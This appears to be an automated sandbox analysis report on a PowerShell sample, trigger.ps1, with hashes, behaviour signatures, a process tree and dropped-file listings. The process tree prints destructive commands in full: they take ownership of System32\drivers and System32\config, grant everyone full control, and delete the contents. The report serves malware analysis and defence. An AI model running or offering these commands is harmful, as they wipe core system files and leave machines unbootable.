Analysis
-
max time kernel
16s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
13-08-2024 20:55
Static task
static1
Behavioral task
behavioral1
Sample
trigger.ps1
Resource
win7-20240705-en
General
-
Target
trigger.ps1
-
Size
1KB
-
MD5
84cb1e2083b8106b83a45c6aa00dd55d
-
SHA1
e12ea5b7deb81774acb89088dc1f2dce755782e9
-
SHA256
735116a2700250eb6865f98ebef5519c9de350fde9fc5bb0a3b3c18a63486c78
-
SHA512
4b01e6fcd0776596cf39de15cf7b8777f508246c6fb0f0023067db9116d364bd4693b71d9273c942c9357f18a2a631ec698b7e0a00d3f239da90df0b882e5e3a
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2652 takeown.exe 2596 icacls.exe 2740 takeown.exe 2552 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2652 takeown.exe 2596 icacls.exe 2740 takeown.exe 2552 icacls.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exechrome.exepid process 1544 powershell.exe 3048 chrome.exe 3048 chrome.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exetakeown.exechrome.exedescription pid process Token: SeDebugPrivilege 1544 powershell.exe Token: SeTakeOwnershipPrivilege 2652 takeown.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe Token: SeShutdownPrivilege 3048 chrome.exe -
Suspicious use of FindShellTrayWindow 51 IoCs
Processes:
chrome.exepid process 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe -
Suspicious use of SendNotifyMessage 48 IoCs
Processes:
chrome.exepid process 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe 3048 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
powershell.execsc.execmd.execmd.exechrome.exedescription pid process target process PID 1544 wrote to memory of 2556 1544 powershell.exe csc.exe PID 1544 wrote to memory of 2556 1544 powershell.exe csc.exe PID 1544 wrote to memory of 2556 1544 powershell.exe csc.exe PID 2556 wrote to memory of 2772 2556 csc.exe cvtres.exe PID 2556 wrote to memory of 2772 2556 csc.exe cvtres.exe PID 2556 wrote to memory of 2772 2556 csc.exe cvtres.exe PID 1544 wrote to memory of 2104 1544 powershell.exe cmd.exe PID 1544 wrote to memory of 2104 1544 powershell.exe cmd.exe PID 1544 wrote to memory of 2104 1544 powershell.exe cmd.exe PID 2104 wrote to memory of 2652 2104 cmd.exe takeown.exe PID 2104 wrote to memory of 2652 2104 cmd.exe takeown.exe PID 2104 wrote to memory of 2652 2104 cmd.exe takeown.exe PID 2104 wrote to memory of 2596 2104 cmd.exe icacls.exe PID 2104 wrote to memory of 2596 2104 cmd.exe icacls.exe PID 2104 wrote to memory of 2596 2104 cmd.exe icacls.exe PID 1544 wrote to memory of 1704 1544 powershell.exe cmd.exe PID 1544 wrote to memory of 1704 1544 powershell.exe cmd.exe PID 1544 wrote to memory of 1704 1544 powershell.exe cmd.exe PID 1704 wrote to memory of 2740 1704 cmd.exe takeown.exe PID 1704 wrote to memory of 2740 1704 cmd.exe takeown.exe PID 1704 wrote to memory of 2740 1704 cmd.exe takeown.exe PID 1704 wrote to memory of 2552 1704 cmd.exe icacls.exe PID 1704 wrote to memory of 2552 1704 cmd.exe icacls.exe PID 1704 wrote to memory of 2552 1704 cmd.exe icacls.exe PID 3048 wrote to memory of 2388 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2388 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2388 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe PID 3048 wrote to memory of 2536 3048 chrome.exe chrome.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ptkhlbfa.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE947.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE946.tmp"3⤵PID:2772
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && exit"2⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2596
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\config\* >nul && icacls C:\Windows\System32\config\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\config\* >nul 2>&1 && exit"2⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\config\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2740
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\config\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2552
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1c39758,0x7fef1c39768,0x7fef1c397782⤵PID:2388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1112 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:22⤵PID:2536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1368 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:82⤵PID:2144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:82⤵PID:1240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2088 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:12⤵PID:2952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2096 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:12⤵PID:1684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1576 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:22⤵PID:1304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2824 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:12⤵PID:1080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3612 --field-trial-handle=1456,i,4685355204349144112,12617372903317574060,131072 /prefetch:82⤵PID:2480
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:332
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16B
MD5aefd77f47fb84fae5ea194496b44c67a
SHA1dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA2564166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
Filesize
1KB
MD5f6889b033096c70be374c2949e42df7a
SHA1ca86bf05395c0951fd602ff62b1e0d22e3203b9c
SHA256b35f178e024387a026a9cdffbe94c908f1b7b3f57b8c7258168b82a2f5543ff6
SHA512b89d6c50872d281197253ca102e3d497d5f5f317af4157f34b4d63e7a6b0b4e4ddb82ae5ce57b1b5c80e583aadfa7bcaecf6a2ee3b1722e5c5502dc9e8bca4a9
-
Filesize
3KB
MD54d8961bd8c6a6ee6655c177806dc1d77
SHA1ff2b92fb04c09f3f8e9c79c6e7d37969be556ad0
SHA2562a5ad5ec20e02d0fe8e464b9b6355ca564dfe4f31cb1c3ad42f60ab8839a1348
SHA512083484c5fac01458b82dade9106dfcfe2e1da2b5838218e60a5350682da06e82af53150738bbb388d49f4594dbbc93f5e349ea3cc71eb6c6258704f619cfd155
-
Filesize
11KB
MD5fb82e9d51879cee211c397e82b2d0147
SHA1504c2f160a4d6854e18bb994a6c13a3d847c2fae
SHA256d5dcae6a58793c0f1245593eb8a54675271255bdea101c45d036e548c2df4485
SHA512f94bde06c3633f363a3846936aad6b6dce083af81254828f6d9e538c0de234c79cde23426bd0381a916f8c144780fd334ed04f35567f69cca793e2615dddfc8f
-
Filesize
652B
MD57c7c012660b8b57b7cbd420695cf6201
SHA1f984c3b6ea7c992cfdcf876bb6e27cb685aed5cd
SHA256cdebb2e8d20e81d2d547d2fecfd1bdc0f4c7be797b2af12ce97acd97f87db100
SHA5126625fc4f37889911baeeb51f7c3704096a6bf4943436935469d7e8c562a44993c6615dc4a603ccfa1745aa23394a2df7cc0c7bbef5757750b4b3e70ce3b60650
-
Filesize
819B
MD541f8d18f0172904a2236dd9396ead480
SHA135e7150c927b97b26d922f07a51e8fe833752933
SHA256d842c81d3641d456116098208a48542a96d5e4d256169069189e459cc265cef5
SHA51243dea5a479cf203bde58b412ac1ca7c064048e7d4544b2ef4354773a1805ccba2b85e6772466da0b9409fadaaa0f6f49654ed1e33a9ef75a4d43c3f058773da3
-
Filesize
309B
MD57d7998eb6bfc478f040353d9c8c82773
SHA1a97cd60009a6f1d0c69e1d2b6d24470a1363b8bc
SHA25611e342dd56017b3873e93db0ce5f3e9ecea70a5ad431f8cbb56599b2568e3a5d
SHA5125ccb540f879a775477c87ee877c508a09cd976306e82476356cd6b5f29bd9e25ce00cf1ddcb773a9b6e2afd87779229c1f7e6ba9dc8cb9951a0c1cde7e294d3d
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e